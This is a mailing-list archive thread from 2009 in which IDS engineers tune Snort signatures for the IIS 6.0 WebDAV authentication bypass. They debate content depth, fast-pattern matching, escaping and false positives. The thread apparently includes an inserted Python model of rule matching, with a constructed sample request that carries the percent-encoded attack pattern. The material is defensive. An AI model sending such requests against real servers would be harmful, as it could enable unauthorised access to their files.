> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"CURRENT_EVENTS IIS6.0 WebDav RemoteAuth Bypass - GET METHOD"; flow:to_server,established; content:"GET "; depth:4; content:"Translate|3a| f"; nocase; pcre:"/GET.*%..%.*HTTP/Bi"; classtype:web-application-attack; reference:url,isc.sans.org/diary.html?storyid=6397; sid:xxxxxxxx; rev:1;)
>

Does anyone have, just a mess of http requests in pcap form? Perhaps with this exploit in it? I have some, but if someone has a good big pcap, that would be more ideal.
Reason I am asking is -- Many people have said over the years to add a "GET" or a "POST" to improve performance, or to reduce falses, etc.. I'd like to run a bunch of tests for these theories, which I will publish, but if someone has a big pcap I can have, that would be great.

Usual non-disclosures of content within the pcap would of course be applied. If you have a pcap I can use, you know, maybe 20 Mb's and up? 300-400 would be nice.

Full session please, not just the request portions.

Contact me off list if you wish.

--
joel esler

From frank at knobbe.us Wed May 20 20:49:09 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Wed, 20 May 2009 19:49:09 -0500
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <314cf0830905201741o1b211c70o526e196017745a3d@mail.gmail.com>
References: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com> <1242865846.97653.27.camel@localhost> <314cf0830905201741o1b211c70o526e196017745a3d@mail.gmail.com>
Message-ID: <1242866949.97653.35.camel@localhost>

On Wed, 2009-05-20 at 20:41 -0400, Joel Esler wrote:
> Many people have said over the years to add a "GET" or a "POST" to improve performance, or to reduce falses, etc..

Hey, that wasn't you? ;)

It's important to stress that GET|POST matches should be done with offset 0 and depth 4|5 (incl space). That's the whole point. Avoid looking into the whole packet for GET|POST. Just do a quick check at the beginning of the packet (hey, 4-5 bytes, how long can that take? :) and if GET|POST|HEAD|etc is present, then do the longer content checks including pcre.

Granted, if you only look for one content match, adding the GET check might actually be longer since Snort now has to do two lookups. But for any more complex checks (multiple content, pcre, etc), I think a quick out if no GET is present would increase performance.

Coming to think of it, just a single match has to be matched anywhere in the packet, so you have to go the match sliding through the packet (but I admit, I'm not sure how Snort does the match. My guess is that it's not a "for(i=0;i +i,string))" sorta lookup.

But I hear ya! I'd like to see such test results too!

> I'd like to run a bunch of tests for these theories, which I will publish, but if someone has a big pcap I can have, that would be great.
>
> Usual non-disclosures of content within the pcap would of course be applied. If you have a pcap I can use, you know, maybe 20 Mb's and up? 300-400 would be nice.
>
> Full session please, not just the request portions.
>
> Contact me off list if you wish.
>
> --
> joel esler

--
It is said that the Internet is a public utility. As such, it is best
compared to a sewer. A big, fat pipe with a bunch of crap sloshing
against your ports.
From eslerj at gmail.com Wed May 20 20:56:22 2009
From: eslerj at gmail.com (Joel Esler)
Date: Wed, 20 May 2009 20:56:22 -0400
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <1242866949.97653.35.camel@localhost>
References: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com> <1242865846.97653.27.camel@localhost> <314cf0830905201741o1b211c70o526e196017745a3d@mail.gmail.com> <1242866949.97653.35.camel@localhost>
Message-ID: <314cf0830905201756q445d743era74da741213a0e66@mail.gmail.com>

On Wed, May 20, 2009 at 8:49 PM, Frank Knobbe wrote:
> On Wed, 2009-05-20 at 20:41 -0400, Joel Esler wrote:
>
> > Many people have said over the years to add a "GET" or a "POST" to improve performance, or to reduce falses, etc..
>
> Hey, that wasn't you? ;)

No, I've always said "the http_inspect preprocessor should validate that". I've never said to do it one way or the other; in fact, I've probably said remove it. Read below to find out more...

> It's important to stress that GET|POST matches should be done with offset 0 and depth 4|5 (incl space). That's the whole point. Avoid looking into the whole packet for GET|POST. Just do a quick check at the beginning of the packet (hey, 4-5 bytes, how long can that take? :) and if GET|POST|HEAD|etc is present, then do the longer content checks including pcre.
>
> Granted, if you only look for one content match, adding the GET check might actually be longer since Snort now has to do two lookups. But for any more complex checks (multiple content, pcre, etc), I think a quick out if no GET is present would increase performance. Coming to think of it, just a single match has to be matched anywhere in the packet, so you have to go the match sliding through the packet (but I admit, I'm not sure how Snort does the match. My guess is that it's not a "for(i=0;i +i,string))" sorta lookup.
>
> But I hear ya! I'd like to see such test results too!
>

When Snort starts, (this is going to be basic), Snort looks at the ruleset and memorizes the longest content match within the rule. This content match is then used within the engine for the FP matcher.

My personal theory, (and this is why I want a big pcap to test with), is that doing a content match for "GET" and "POST" would be pointless, and actually slower than having a rule without it, since GET or POST is probably not going to be the longest content match. (not every time, but most likely.) This is actually generating ANOTHER step, which will slow the engine down, not significantly, but it should be slower than without.

Again, just my theory, I'd like to test it, I have the testbed set up to do it, I just need a bigger HTTP pcap.

--
joel esler
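The two positions argued in this exchange, Frank's "GET " anchored at byte 0 with depth:4 as a cheap early-out, and Joel's point that the engine prefilters on a rule's longest content so a short "GET " never becomes the fast pattern, can be made concrete with a small model. What follows is an editor-added example, not code from the list and not Snort's engine: it implements Snort's content semantics (offset, depth, nocase), pcre with the i modifier, and longest-content fast-pattern selection, then runs Frank's GET rule from his earlier message over four constructed HTTP requests. The position counter is a naive-search model used only to show the anchored-versus-sliding difference; the sample requests are constructed, not captured traffic.

```python
"""Toy model of Snort 2 content/pcre evaluation for the thread's IIS 6.0 WebDAV rules.

Added example, not code from the thread and not Snort's engine. It models
three things the thread argues about: 'content' with offset/depth/nocase
(Frank's "GET " with depth:4 is a compare anchored at byte 0, not a sliding
search), 'pcre' with the i modifier, and Joel's point that the engine
prefilters each packet with the rule's longest content (the fast pattern),
so a short "GET " is never the fast pattern when a longer content exists.
Evaluation order and the naive position count are simplifications.
"""
import re


class Content:
    """Snort 'content' option with optional offset, depth and nocase."""

    def __init__(self, pattern, offset=0, depth=None, nocase=False):
        self.pattern = pattern.lower() if nocase else pattern
        self.offset, self.depth, self.nocase = offset, depth, nocase
        self.positions_examined = 0   # start offsets a naive search would touch

    def match(self, payload):
        end = len(payload) if self.depth is None else self.offset + self.depth
        space = payload[self.offset:end]          # the search space
        if self.nocase:
            space = space.lower()
        idx = space.find(self.pattern)
        if idx == -1:
            self.positions_examined += max(0, len(space) - len(self.pattern) + 1)
        else:
            self.positions_examined += idx + 1
        return idx != -1


class Pcre:
    """Snort 'pcre' option; 'i' becomes re.IGNORECASE. The 'B' modifier (match
    the raw payload rather than the normalised HTTP buffer) is implicit here
    because this model only ever sees raw bytes."""

    def __init__(self, regex, nocase=False):
        self.rx = re.compile(regex, re.IGNORECASE if nocase else 0)

    def match(self, payload):
        return self.rx.search(payload) is not None


class Rule:
    def __init__(self, msg, options):
        self.msg, self.options = msg, options
        contents = [o for o in options if isinstance(o, Content)]
        # Snort 2 defaults to the longest content as the fast pattern
        # (a rule can override that with the fast_pattern modifier).
        self.fast_pattern = max(contents, key=lambda c: len(c.pattern)) if contents else None

    def evaluate(self, payload):
        """Return (passed_prefilter, full_match)."""
        fp = self.fast_pattern
        if fp is not None:
            haystack = payload.lower() if fp.nocase else payload
            if fp.pattern not in haystack:      # prefilter: whole payload, no offset/depth
                return False, False
        for opt in self.options:                # then the options, in rule order
            if not opt.match(payload):
                return True, False
        return True, True


def franks_get_rule():
    """Frank Knobbe's GET-method rule from the thread, expressed in this model."""
    return Rule("IIS6.0 WebDav RemoteAuth Bypass - GET METHOD", [
        Content(b"GET ", depth=4),               # content:"GET "; depth:4;
        Content(b"Translate: f", nocase=True),   # content:"Translate|3a| f"; nocase;
        Pcre(rb"GET.*%..%.*HTTP", nocase=True),  # pcre:"/GET.*%..%.*HTTP/Bi";
    ])


# Constructed sample requests, not captured traffic.
SAMPLE_REQUESTS = [
    # percent-encoded sequence in the path plus Translate: f, what the rule is for
    b"GET /share/%c0%af/index.html HTTP/1.1\r\nHost: www.example.com\r\nTranslate: f\r\n\r\n",
    # ordinary request: fails the fast pattern, the rule body never runs
    b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n",
    # a WebDAV client sending Translate: f for a plain path: prefilter hits, pcre fails
    b"GET /docs/report.doc HTTP/1.1\r\nHost: www.example.com\r\nTranslate: f\r\n\r\n",
    # PROPFIND: rejected by the anchored "GET " compare before the pcre runs
    b"PROPFIND /share/%c0%af/ HTTP/1.1\r\nHost: www.example.com\r\nTranslate: f\r\n\r\n",
]


def run_ruleset(rules, payloads):
    """Evaluate every rule against every payload and summarise the outcome."""
    stats = {}
    for rule in rules:
        prefilter = full = 0
        for p in payloads:
            hit, matched = rule.evaluate(p)
            prefilter += hit
            full += matched
        stats[rule.msg] = {"prefilter_hits": prefilter, "full_matches": full,
                           "fast_pattern": rule.fast_pattern.pattern}
    return stats


def compare_get_checks(payload):
    """Start offsets a naive search examines for "GET " anchored with depth:4
    versus unanchored (sliding over the whole payload)."""
    anchored, sliding = Content(b"GET ", depth=4), Content(b"GET ")
    anchored.match(payload)
    sliding.match(payload)
    return anchored.positions_examined, sliding.positions_examined


if __name__ == "__main__":
    rule = franks_get_rule()
    print(run_ruleset([rule], SAMPLE_REQUESTS))
    print("GET check positions on the PROPFIND request (anchored, sliding):",
          compare_get_checks(SAMPLE_REQUESTS[3]))
```

Over the four requests the fast pattern is "translate: f" (twelve bytes, so "GET " is never chosen), three requests pass the prefilter and exactly one matches fully; the anchored "GET " compare costs one position on each request that reaches it, while the same content without depth would slide across the whole PROPFIND request. That is both arguments in one run: the extra content is one more step after the prefilter, but a one-position step.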
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090520/6276a5d9/attachment.html From frank at knobbe.us Wed May 20 21:05:13 2009 From: frank at knobbe.us (Frank Knobbe) Date: Wed, 20 May 2009 20:05:13 -0500 Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass In-Reply-To: <314cf0830905201756q445d743era74da741213a0e66@mail.gmail.com> References: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com> <1242865846.97653.27.camel@localhost> <314cf0830905201741o1b211c70o526e196017745a3d@mail.gmail.com> <1242866949.97653.35.camel@localhost> <314cf0830905201756q445d743era74da741213a0e66@mail.gmail.com> Message-ID: <1242867913.97653.43.camel@localhost> On Wed, 2009-05-20 at 20:56 -0400, Joel Esler wrote: > When Snort starts, (this is going to be basic), Snort looks at the > ruleset and memorizes the longest content match within the rule. This > content match is then used within the engine for the FP matcher. > > My personal theory, (and this is why i want a big pcap to test with), > is that doing a content match for "GET" and "POST" would be pointless, > and actually slower than having a rule without it, since GET or POST > is probably not going to be the longest content match. (not > everytime, but most likely.) This is actually generating ANOTHER > step, which will slow the engine down, not significantly, but it > should be slower than without. Sounds like the engine is broken ;) Wouldn't it make more sense to start with that match that has the least CPU expense? That being figured by the length of the string in relation to the search space (depth or within)? Just playing arm-chair optimizer here. I'm sure the pros have poured over optimizing Snort a gazillion times. And I understand the reason for using the longest match first. I just don't understand why the depth of the search space wouldn't be considered. (and matching "GET " without any sliding saerchspace [depth|within=4] is pretty much the ideal content match, is it not?) 
Cheers,
Frank

--
It is said that the Internet is a public utility. As such, it is best
compared to a sewer. A big, fat pipe with a bunch of crap sloshing
against your ports.

From jgimer at gmail.com Wed May 20 21:24:47 2009
From: jgimer at gmail.com (Joshua Gimer)
Date: Wed, 20 May 2009 19:24:47 -0600
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <1242865846.97653.27.camel@localhost>
References: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com> <1242865846.97653.27.camel@localhost>
Message-ID:

Wouldn't performing a content match on GET not really provide that much of a benefit in that it narrows down the rule to 70% of web traffic? That is why the content match was done on "Translate" instead; it is required using this method to be successful.

As far as escaping the colons in the pcre match, I cannot see why this would matter (please let me know if I am missing something).

"Translate: f" alone does not indicate that the attack is being carried out, it is this in combination with a Unicode sequence within the request that indicates that the attack is under way.

Adapting the rules to other methods should be easy enough, maybe something like:

alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote Auth Bypass - GET METHOD"; content:"Translate:"; nocase; pcre:"/(GET|PUT|HEAD).*%..%.*HTTP/Bi"; pcre:"/Translate: *f/i"; reference:url,isc.sans.org/diary.html?storyid=6397;sid:1000004; rev:1;)

If I am missing something please let me know, and thanks to everyone for their input.
:)

Josh

On Wed, May 20, 2009 at 6:30 PM, Frank Knobbe wrote:
> On Tue, 2009-05-19 at 18:20 -0600, Joshua Gimer wrote:
>> Well that is good and all, but if you want something a little more
>> specific in the alert msg here is a (minimally) optimized GET method
>> rule:
>>
>> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
>> Auth Bypass - GET METHOD"; content:"Translate:"; nocase;
>> pcre:"/GET.*%..%.*HTTP/Bi"; pcre:"/Translate: *f/i";
>> reference:url,isc.sans.org/diary.html?storyid=6397;sid:1000004;
>> rev:1;)
>
> Not like that :)
>
> Add a " content:"GET "; depth:4; " to the beginning to help performance.
> The colons in the content and pcre match are not escaped. Are you sure
> the second pcre is necessary?
>
> How about:
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS
> (msg:"CURRENT_EVENTS IIS6.0 WebDav RemoteAuth Bypass - GET METHOD";
> flow:to_server,established; content:"GET "; depth:4; content:"Translate|
> 3a| f"; nocase; pcre:"/GET.*%..%.*HTTP/Bi";
> classtype:web-application-attack;
> reference:url,isc.sans.org/diary.html?storyid=6397; sid:xxxxxxxx;
> rev:1;)
>
> And of course one for POST, HEAD, and perhaps COPY, MOVE and DAV?
>
> -Frank
>

--
Thx
Joshua Gimer

From frank at knobbe.us Wed May 20 21:34:34 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Wed, 20 May 2009 20:34:34 -0500
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To:
References: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com> <1242865846.97653.27.camel@localhost>
Message-ID: <1242869674.97653.50.camel@localhost>

On Wed, 2009-05-20 at 19:24 -0600, Joshua Gimer wrote:
> Wouldn't performing a content match on GET not really provide that
> much of a benefit in that it narrows down the rule to 70% of web
> traffic?

It narrows the rule to web requests, that's the point. If you look at other rules, we always use the GET and/or POST checks. Original idea was about performance improvement. The thinking was that it is less expensive to check for "GET "; offset:0; depth:4; (just a single match if those 4 bytes are in the first, well, 4 bytes of the packet) than running a check on "Translate" *anywhere* in the packet. (Is "translate" present at offset 0? No, how about offset 1? No, how about offset 2? No, how about...

Anyway, Joel just brought that discussion up again. I think putting that theory to the test will be good. Although if I remember correctly, that added check was added back when we ran submissions through the TurboSnort rules thingy to gauge rule performance.

> As far as
> escaping the colons in the pcre match, I cannot see why this would
> matter (please let me know if I am missing something).

Doesn't your Snort complain about a parsing error? (Oh wait, the newer versions don't complain, they just ignore the rule, right? :)

Any colon has to be escaped in content and pcre matches. Or written as |3a|. That's always been like that.

Cheers,
Frank

--
It is said that the Internet is a public utility. As such, it is best
compared to a sewer. A big, fat pipe with a bunch of crap sloshing
against your ports.

From jgimer at gmail.com Wed May 20 21:45:11 2009
From: jgimer at gmail.com (Joshua Gimer)
Date: Wed, 20 May 2009 19:45:11 -0600
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <1242869674.97653.50.camel@localhost>
References: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com> <1242865846.97653.27.camel@localhost> <1242869674.97653.50.camel@localhost>
Message-ID:

Not trying to argue but Snort doesn't complain about the colon when I use it, and I know that it doesn't discard the rule (tested/matches/alerts).
On Wed, May 20, 2009 at 7:34 PM, Frank Knobbe wrote:
> Doesn't your Snort complain about a parsing error? (Oh wait, the newer
> versions don't complain, they just ignore the rule, right? :)
>
> Any colon has to be escaped in content and pcre matches. Or written as
> |3a|. That's always been like that.
>
>
> Cheers,
> Frank
>

--
Thx
Joshua Gimer

From frank at knobbe.us Wed May 20 21:46:20 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Wed, 20 May 2009 20:46:20 -0500
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To:
References: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com> <1242865846.97653.27.camel@localhost> <1242869674.97653.50.camel@localhost>
Message-ID: <1242870380.97653.51.camel@localhost>

On Wed, 2009-05-20 at 19:45 -0600, Joshua Gimer wrote:
> Not trying to argue but Snort doesn't complain about the colon when I
> use it, and I know that it doesn't discard the rule
> (tested/matches/alerts).

What version of Snort are you using?

-Frank

From jgimer at gmail.com Wed May 20 21:56:09 2009
From: jgimer at gmail.com (Joshua Gimer)
Date: Wed, 20 May 2009 19:56:09 -0600
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <1242870380.97653.51.camel@localhost>
References: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com> <1242865846.97653.27.camel@localhost> <1242869674.97653.50.camel@localhost> <1242870380.97653.51.camel@localhost>
Message-ID:

Version 2.8.3.2 (Build 22)

Initializing rule chains...
6633 Snort rules read
    6633 detection rules
    0 decoder rules
    0 preprocessor rules
6633 Option Chains linked into 339 Chain Headers
0 Dynamic rules

On Wed, May 20, 2009 at 7:46 PM, Frank Knobbe wrote:
> On Wed, 2009-05-20 at 19:45 -0600, Joshua Gimer wrote:
>> Not trying to argue but Snort doesn't complain about the colon when I
>> use it, and I know that it doesn't discard the rule
>> (tested/matches/alerts).
>
> What version of Snort are you using?
>
>
> -Frank
>

--
Thx
Joshua Gimer

From frank at knobbe.us Wed May 20 21:59:55 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Wed, 20 May 2009 20:59:55 -0500
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To:
References: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com> <1242865846.97653.27.camel@localhost>
Message-ID: <1242871195.97653.55.camel@localhost>

On Wed, 2009-05-20 at 19:24 -0600, Joshua Gimer wrote:
> Adapting the rules to other methods should be easy enough, maybe something like:
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
> Auth Bypass - GET METHOD"; content:"Translate:"; nocase;
> pcre:"/(GET|PUT|HEAD).*%..%.*HTTP/Bi"; pcre:"/Translate: *f/i";
> reference:url,isc.sans.org/diary.html?storyid=6397;sid:1000004;
> rev:1;)

I just ran it for 3 minutes on my sensors and had to immediately pull it :) Sorry, just way too many FP's since it fires on legitimate encodings (like "help%20%20me" :)

Sorry, as I had thought yesterday, we need sigs for the dangerous Unicode versions. %..%.. simply isn't cutting it :)

Cheers,
Frank

PS: That said, the VRT rule created more FP's :)

--
It is said that the Internet is a public utility. As such, it is best
compared to a sewer. A big, fat pipe with a bunch of crap sloshing
against your ports.

From spooker at gmail.com Thu May 21 00:26:56 2009
From: spooker at gmail.com (Rodrigo Montoro(Sp0oKeR))
Date: Thu, 21 May 2009 01:26:56 -0300
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <1242871195.97653.55.camel@localhost>
References: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com> <1242865846.97653.27.camel@localhost> <1242871195.97653.55.camel@localhost>
Message-ID: <9255886c0905202126i779c71d9o4ec069cfea4cecb8@mail.gmail.com>

Since I saw them in the Snort 2.8.3 release I have never seen people using them to create rules (that includes myself).

2008-09-04 - Snort 2.8.3

[*] New Additions
    * New Feature for HTTP Inspect to split requests into 5 components - Method, URI, Header (non-cookie), Cookies, Body.

http_method ( http://www.snort.org/docs/snort_htmanuals/htmanual_284/node257.html ) keyword and http_headers ( http://www.snort.org/docs/snort_htmanuals/htmanual_284/node254.html ).

My question is: don't those keywords improve performance?

Regards,

On Wed, May 20, 2009 at 10:59 PM, Frank Knobbe wrote:
> On Wed, 2009-05-20 at 19:24 -0600, Joshua Gimer wrote:
>> Adapting the rules to other methods should be easy enough, maybe something like:
>>
>> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
>> Auth Bypass - GET METHOD"; content:"Translate:"; nocase;
>> pcre:"/(GET|PUT|HEAD).*%..%.*HTTP/Bi"; pcre:"/Translate: *f/i";
>> reference:url,isc.sans.org/diary.html?storyid=6397;sid:1000004;
>> rev:1;)
>
>
> I just ran it for 3 minutes on my sensors and had to immediately pull
> it :) Sorry, just way too many FP's since it fires on legitimate
> encodings (like "help%20%20me" :)
>
>
> Sorry, as I had thought yesterday, we need sigs for the dangerous
> Unicode versions. %..%.. simply isn't cutting it :)
>
>
> Cheers,
> Frank
>
>
> PS: That said, the VRT rule created more FP's :)
>
>
> --
> It is said that the Internet is a public utility. As such, it is best
> compared to a sewer. A big, fat pipe with a bunch of crap sloshing
> against your ports.
>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
>

--
===========================
Rodrigo Montoro (Sp0oKeR)
http://www.spooker.com.br
http://www.snort.org.br
http://www.linkedin.com/in/spooker
===========================

From eslerj at gmail.com Thu May 21 08:51:18 2009
From: eslerj at gmail.com (Joel Esler)
Date: Thu, 21 May 2009 08:51:18 -0400
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <1242867913.97653.43.camel@localhost>
References: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com> <1242865846.97653.27.camel@localhost> <314cf0830905201741o1b211c70o526e196017745a3d@mail.gmail.com> <1242866949.97653.35.camel@localhost> <314cf0830905201756q445d743era74da741213a0e66@mail.gmail.com> <1242867913.97653.43.camel@localhost>
Message-ID: <314cf0830905210551p2bdcc1dh4bb1d45c56930980@mail.gmail.com>

On Wed, May 20, 2009 at 9:05 PM, Frank Knobbe wrote:
> On Wed, 2009-05-20 at 20:56 -0400, Joel Esler wrote:
>
> > When Snort starts, (this is going to be basic), Snort looks at the
> > ruleset and memorizes the longest content match within the rule. This
> > content match is then used within the engine for the FP matcher.
> >
> > My personal theory, (and this is why I want a big pcap to test with),
> > is that doing a content match for "GET" and "POST" would be pointless,
> > and actually slower than having a rule without it, since GET or POST
> > is probably not going to be the longest content match. (not
> > every time, but most likely.)
> > This is actually generating ANOTHER
> > step, which will slow the engine down, not significantly, but it
> > should be slower than without.
>
> Sounds like the engine is broken ;) Wouldn't it make more sense to
> start with that match that has the least CPU expense? That being figured
> by the length of the string in relation to the search space (depth or
> within)?
>
> Just playing arm-chair optimizer here. I'm sure the pros have pored
> over optimizing Snort a gazillion times. And I understand the reason for
> using the longest match first. I just don't understand why the depth of
> the search space wouldn't be considered. (and matching "GET " without
> any sliding search space [depth|within=4] is pretty much the ideal
> content match, is it not?)

No, as you said, the guys in devel have pored over this a gazillion times, and continually do so, as speed is one of the greatest factors of competition in our industry. Matching the longest content string through the FPM simply finds the rule to run, then the rule is run against the packet (or flowbit string, or stream, or whatever); the FPM is just the pre-qualification step against billions of packets a second. This is why, in theory, doing a GET wouldn't do any speed enhancements.

--
joel esler | Sourcefire | gtalk: jesler at sourcefire.com | 302-223-5974

From eslerj at gmail.com Thu May 21 08:52:19 2009
From: eslerj at gmail.com (Joel Esler)
Date: Thu, 21 May 2009 08:52:19 -0400
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <9255886c0905202126i779c71d9o4ec069cfea4cecb8@mail.gmail.com>
References: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com> <1242865846.97653.27.camel@localhost> <1242871195.97653.55.camel@localhost> <9255886c0905202126i779c71d9o4ec069cfea4cecb8@mail.gmail.com>
Message-ID: <314cf0830905210552h16d16f45of44eece2cbe3812e@mail.gmail.com>

On Thu, May 21, 2009 at 12:26 AM, Rodrigo Montoro(Sp0oKeR) < spooker at gmail.com> wrote:
> Since I saw them in the Snort 2.8.3 release I have never seen people using them
> to create rules (that includes myself).
>
> 2008-09-04 - Snort 2.8.3
>
> [*] New Additions
> * New Feature for HTTP Inspect to split requests into 5 components -
> Method, URI, Header (non-cookie), Cookies, Body.
>
>
>
> http_method (
> http://www.snort.org/docs/snort_htmanuals/htmanual_284/node257.html
> ) keyword and http_headers (
> http://www.snort.org/docs/snort_htmanuals/htmanual_284/node254.html )
> .
>
> My question is: don't those keywords improve performance?
>
>

Something else I will be happy to test for everyone in my test lab, if someone can capture a big pcap of HTTP. Full Snaplength too!

--
joel esler | Sourcefire | gtalk: jesler at sourcefire.com | 302-223-5974

From eslerj at gmail.com Thu May 21 08:54:19 2009
From: eslerj at gmail.com (Joel Esler)
Date: Thu, 21 May 2009 08:54:19 -0400
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <1242871195.97653.55.camel@localhost>
References: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com> <1242865846.97653.27.camel@localhost> <1242871195.97653.55.camel@localhost>
Message-ID: <314cf0830905210554w76d113e5gf871863371609aa1@mail.gmail.com>

On Wed, May 20, 2009 at 9:59 PM, Frank Knobbe wrote:
> On Wed, 2009-05-20 at 19:24 -0600, Joshua Gimer wrote:
> > Adapting the rules to other methods should be easy enough, maybe
> something like:
> >
> > alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
> > Auth Bypass - GET METHOD"; content:"Translate:"; nocase;
> > pcre:"/(GET|PUT|HEAD).*%..%.*HTTP/Bi"; pcre:"/Translate: *f/i";
> > reference:url,isc.sans.org/diary.html?storyid=6397;sid:1000004;
> > rev:1;)
>
>
> I just ran it for 3 minutes on my sensors and had to immediately pull
> it :) Sorry, just way too many FP's since it fires on legitimate
> encodings (like "help%20%20me" :)
>
>
> Sorry, as I had thought yesterday, we need sigs for the dangerous
> Unicode versions. %..%.. simply isn't cutting it :)
>
>

This is why the http_inspect preprocessor was recommended, there isn't need for a rule in this situation, there is need for code already in place. The same reason why writing rules for USER.*{100} in FTP rules is stupid, the ftp preprocessor does this for you.

--
joel esler | Sourcefire | gtalk: jesler at sourcefire.com | 302-223-5974

From eslerj at gmail.com Thu May 21 08:59:04 2009
From: eslerj at gmail.com (Joel Esler)
Date: Thu, 21 May 2009 08:59:04 -0400
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <1242869674.97653.50.camel@localhost>
References: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com> <1242865846.97653.27.camel@localhost> <1242869674.97653.50.camel@localhost>
Message-ID: <314cf0830905210559v65621d42rcde1bee3e72ea8ec@mail.gmail.com>

On Wed, May 20, 2009 at 9:34 PM, Frank Knobbe wrote:
> On Wed, 2009-05-20 at 19:24 -0600, Joshua Gimer wrote:
> > Wouldn't performing a content match on GET not really provide that
> > much of a benefit in that it narrows down the rule to 70% of web
> > traffic?
>
> It narrows the rule to web requests, that's the point. If you look at
> other rules, we always use the GET and/or POST checks. Original idea
> was about performance improvement. The thinking was that it is less
> expensive to check for "GET "; offset:0; depth:4; (just a single match if
> those 4 bytes are in the first, well, 4 bytes of the packet) than
> running a check on "Translate" *anywhere* in the packet. (Is "translate"
> present at offset 0? No, how about offset 1? No, how about offset 2? No,
> how about...
>
> Anyway, Joel just brought that discussion up again. I think putting that
> theory to the test will be good. Although if I remember correctly, that
> added check was added back when we ran submissions through the
> TurboSnort rules thingy to gauge rule performance.

TurboSnort's speed tests are not correct, for many reasons, I suggest you don't use it. The only true measure of performance is how the rule will run, on YOUR system, with YOUR version of Snort under YOUR compile of GCC (amongst whatever else causes issues of speed on your machine). That's why perfmonit was built in with rule and preprocessor speed stats. Use it.
>
>
> > As far as
> > escaping the colons in the pcre match, I cannot see why this would
> > matter (please let me know if I am missing something).
>
> Doesn't your Snort complain about a parsing error? (Oh wait, the newer
> versions don't complain, they just ignore the rule, right? :)

Depends on the error, but for the most part Frank, you are correct. The engine coming up is more important than a badly coded rule. Which is why the -T exists.

> Any colon has to be escaped in content and pcre matches. Or written as
> |3a|. That's always been like that.

Colon, Double Quote, Single Quote, and Semicolon. These four have to be escaped (or written in hex, which is preferred)

--
joel esler | Sourcefire | gtalk: jesler at sourcefire.com | 302-223-5974

From eslerj at gmail.com Thu May 21 09:00:15 2009
From: eslerj at gmail.com (Joel Esler)
Date: Thu, 21 May 2009 09:00:15 -0400
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To:
References: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com> <1242865846.97653.27.camel@localhost> <1242869674.97653.50.camel@localhost> <1242870380.97653.51.camel@localhost>
Message-ID: <314cf0830905210600v27005c8ds96114e3e5c2496e3@mail.gmail.com>

On Wed, May 20, 2009 at 9:56 PM, Joshua Gimer wrote:
> Version 2.8.3.2 (Build 22)
>
> Initializing rule chains...
> 6633 Snort rules read
>     6633 detection rules
>     0 decoder rules
>     0 preprocessor rules
> 6633 Option Chains linked into 339 Chain Headers
> 0 Dynamic rules
>
>

I'm only going to say this once, since I say it about 300x a day, stop using packages (if you are), compile from scratch (which you should be) and stay current (2.8.4.1).

J

--
joel esler | Sourcefire | gtalk: jesler at sourcefire.com | 302-223-5974

From frank at knobbe.us Thu May 21 09:38:20 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Thu, 21 May 2009 08:38:20 -0500
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <314cf0830905210559v65621d42rcde1bee3e72ea8ec@mail.gmail.com>
